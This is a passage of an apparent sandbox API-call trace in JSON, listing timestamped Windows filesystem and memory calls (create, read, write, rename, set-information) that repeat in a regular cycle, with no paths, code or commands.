{"category": "process", "timestamp": "2016-02-16 17:41:59,478", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,488", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,498", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,508", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,518", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,528", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,538", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,568", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,588", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,598", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,598", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,608", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,698", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,748", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,758", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,808", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,818", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,838", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 